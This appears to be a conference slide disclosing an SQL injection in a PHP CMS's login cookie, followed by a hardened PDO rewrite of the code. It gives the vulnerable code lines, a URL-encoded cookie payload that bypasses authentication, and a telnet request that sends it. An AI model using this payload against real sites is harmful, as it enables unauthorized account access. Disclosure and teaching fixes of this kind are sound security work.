Attack ALert :: Magic Quotes :: Real World

Login cookie as issued by the CMS (user id and md5 of the password, separated by a dot):

  23.cf5dfc3f4e21fa3d1b0af26c9e72dffd

Vulnerable code path (class2.php):

  // line: 1026 - init_session () [trimmed]
  list($uid, $upw) = explode(".", $_COOKIE[$pref['cookie_name']]);
  // line: 1039
  if ($result = get_user_data($uid, "AND md5(u.user_password)='{$upw}'", FALSE)) {
  // line: 783 - get_user_data ($uid, $extra, $force_join)
  $qry = "SELECT * FROM #user AS u WHERE u.user_id='{$uid}' {$extra}";
  // line: 785 - get_user_data ()
  if ($sql->db_Select_gen($qry))

Cookie value (URL-encoded) that breaks out of the quoted $upw:

  1.%27%20OR%20%27a%27%20=%20%27a

Resulting fragment of the WHERE clause:

  AND md5(u.user_password)='' OR 'a' = 'a'

Sending it by hand:
telnet host.net 80
GET /page.php HTTP/1.1
Host: host.net
Cookie: cookie=1.%27%20OR%20%27a%27%20=%20%27a
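A hardened replacement for the cookie handling shown above, added here as an example (it is not the CMS's code): both halves of the cookie are validated before they go anywhere near SQL, and the values are bound as parameters instead of being interpolated into the query string. It assumes a PDO connection $pdo and a table named user; the CMS's real connection object and table prefix are not shown on the slide.

```php
<?php
// Added example, not the CMS's code. Assumes a PDO connection and a table
// called "user" (the slide shows "#user", a prefixed name we do not know).

function parse_auth_cookie(string $raw): ?array
{
    // Accept exactly "<integer uid>.<32 lowercase hex chars>" and nothing else.
    // Quotes, spaces or a second dot make the match fail, so the value shown
    // on the slide is rejected before any query is built.
    if (!preg_match('/^(\d{1,10})\.([0-9a-f]{32})$/', $raw, $m)) {
        return null;
    }
    return ['uid' => (int) $m[1], 'upw' => $m[2]];
}

function get_user_data_safe(PDO $pdo, string $raw_cookie): ?array
{
    $parts = parse_auth_cookie($raw_cookie);
    if ($parts === null) {
        return null;
    }
    // Bound parameters: the cookie contents can only ever be compared as
    // values, never change the structure of the statement.
    $stmt = $pdo->prepare(
        'SELECT * FROM user AS u WHERE u.user_id = :uid AND md5(u.user_password) = :upw'
    );
    $stmt->execute([':uid' => $parts['uid'], ':upw' => $parts['upw']]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Quick self-check of the parser with the two cookie values from the slide
// (no database needed): the genuine cookie parses, the injected one does not.
var_dump(parse_auth_cookie('23.cf5dfc3f4e21fa3d1b0af26c9e72dffd'));
var_dump(parse_auth_cookie(urldecode('1.%27%20OR%20%27a%27%20=%20%27a')));
```

Input validation here is a second layer, not a substitute for binding: even a value that passes the regex is still passed to the database as a parameter.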


BTW: I have made the CMS vendor aware of this, and asked permission to talk about this vulnerability in this presentation.